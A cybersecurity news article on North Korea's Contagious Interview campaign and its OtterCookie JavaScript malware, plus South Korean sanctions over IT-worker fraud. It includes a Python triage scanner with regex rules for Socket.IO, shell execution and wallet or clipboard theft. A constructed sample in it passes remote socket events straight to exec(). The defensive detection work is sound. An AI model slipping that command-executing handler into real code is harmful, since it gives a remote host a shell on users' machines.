The North Korean threat actors behind the ongoing Contagious Interview campaign have been spotted releasing a new JavaScript malware called OtterCookie.
Contagious Interview (aka DeceptiveDevelopment) refers to an ongoing attack campaign that uses social engineering lures, with the operators often posing as recruiters to trick job seekers into downloading malware under the guise of an interview process.
This involves distributing malware disguised as video conferencing software or npm packages, hosted either on GitHub or in the official package registry, paving the way for malware such as BeaverTail and InvisibleFerret to be deployed.
Palo Alto Networks Unit 42, which first exposed the activity in November 2023, tracks the cluster under the alias CL-STA-0240. It is also known as Famous Chollima and Tenacious Pungsan.
In September 2024, Singaporean cybersecurity company Group-IB documented the first major overhaul of the attack chain, highlighting an updated version of BeaverTail that takes a modular approach, offloading its information-stealing functionality to a set of Python scripts collectively tracked as CivetQ.
It should be noted at this point that Contagious Interview is assessed to be distinct from Operation Dream Job, another long-running North Korean hacking campaign that also uses job-related lures to trigger the malware infection process.
The latest findings from Japanese cybersecurity company NTT Security Holdings reveal that the JavaScript malware responsible for launching BeaverTail is also designed to fetch and execute OtterCookie. The new malware is said to have been introduced in September 2024, with a new version discovered in the wild last month.
Once launched, OtterCookie establishes communication with a command-and-control (C2) server using the Socket.IO JavaScript library and waits for further instructions. It is designed to execute shell commands that facilitate data theft, including files, clipboard contents, and cryptocurrency wallet keys.
An older variant of OtterCookie spotted in September is functionally similar, but differs slightly in implementation: the cryptocurrency wallet key-stealing functionality is embedded directly in the malware rather than delivered as a remote shell command.
This development is a sign that the threat actors are actively updating their tools while leaving the infection chain largely intact, which continues to demonstrate the effectiveness of the campaign.
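The combination described above, a Socket.IO client session to a remote server whose events are handed to a shell, can be turned into a simple static triage check for the contents of an npm package before it is installed. The following is an added example written for this article, not code from NTT Security Holdings or any of the named vendors; the rules, the verdict logic and the sample files are constructed assumptions.

```python
import re

# Each rule is a regex over raw JavaScript source. Hits are combined below;
# no single rule is conclusive on its own (socket.io-client and child_process
# are both common in legitimate packages).
RULES = {
    "socketio_import": re.compile(
        r"require\(\s*['\"]socket\.io-client['\"]\s*\)|from\s+['\"]socket\.io-client['\"]"),
    "remote_connect": re.compile(r"\bio\(\s*['\"](?:https?|wss?)://"),
    "socket_event_handler": re.compile(r"\.on\(\s*['\"][\w:-]+['\"]\s*,"),
    "shell_exec": re.compile(r"child_process|\bexec(?:Sync)?\(|\bspawn(?:Sync)?\("),
    "theft_keywords": re.compile(r"clipboard|wallet|keystore", re.IGNORECASE),
}

def scan_js(source: str) -> dict:
    """Score one JavaScript file. The verdict is 'suspicious' only when the core
    triad is present: Socket.IO client import + connection to a remote URL +
    shell execution. Keyword hits are reported but do not change the verdict."""
    hits = {name: bool(rx.search(source)) for name, rx in RULES.items()}
    core = hits["socketio_import"] and hits["remote_connect"] and hits["shell_exec"]
    return {"hits": hits, "suspicious": core}

def scan_package(files):
    """files: iterable of (path, source) pairs, e.g. every .js file unpacked
    from an npm tarball. Returns the paths whose content is flagged."""
    return [path for path, src in files if scan_js(src)["suspicious"]]

# Constructed samples (not real malware and not real indicators). Host names
# use the reserved .invalid TLD so they can never resolve.
BENIGN_CHAT = """
import { io } from 'socket.io-client';
const socket = io('https://chat.example.invalid');
socket.on('message', (m) => render(m));
"""
BENIGN_BUILD = """
const { execSync } = require('child_process');
execSync('npm test');
"""
SUSPICIOUS = """
const io = require('socket.io-client');
const { exec } = require('child_process');
const socket = io('http://c2.example.invalid');
socket.on('command', (data) => exec(data));
"""
SAMPLES = [("src/chat.js", BENIGN_CHAT), ("scripts/build.js", BENIGN_BUILD),
           ("node_modules/some-dep/index.js", SUSPICIOUS)]

if __name__ == "__main__":
    print(scan_package(SAMPLES))  # ['node_modules/some-dep/index.js']
```

Treat a hit as a lead for sandboxing the package rather than a verdict, since both libraries are legitimately common; the real value is in applying the check before a recruiter-supplied repository or package is ever executed.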
South Korea sanctions 15 North Koreans for IT worker fraud
It also comes as South Korea's Ministry of Foreign Affairs (MoFA) sanctioned 15 individuals and one organization in connection with a fraudulent IT worker scheme orchestrated by its northern counterpart to illegally obtain a steady source of income that can be funnelled back to North Korea, steal data, and in some cases even demand ransom.
There is evidence to suggest that the Famous Chollima threat cluster is also behind the insider threat operation. It is also tracked under various names such as Nickel Tapestry, UNC5267 and Wagemole.
One of the 15 individuals targeted by the sanctions, Kim Ryu Song, was also charged by the US Department of Justice (DoJ) earlier this month for his alleged involvement in a long-running conspiracy to violate sanctions and commit fraud, money laundering and identity theft by illegally seeking employment with US companies and non-profit organizations.
The Foreign Ministry also sanctioned Chosun Geumjeong, an economic information technology exchange company accused of sending large numbers of IT personnel to China, Russia, Southeast Asia and Africa to raise funds for the regime by securing freelance or full-time jobs with Western companies.
These IT workers are said to be part of the 313th General Bureau, an organization under the Munitions Industry Department of the Workers' Party of Korea.
"The 313th General Bureau (…) sends many North Korean IT personnel abroad and uses the foreign currency earned to fund nuclear and missile development, and is involved in the development of software for the military sector," the ministry said.
“North Korea’s illegal cyber activities are not only criminal acts that threaten the security of the cyber ecosystem, but also pose a serious threat to international peace and security as they are used as a means to develop North Korea’s nuclear and missile weapons.”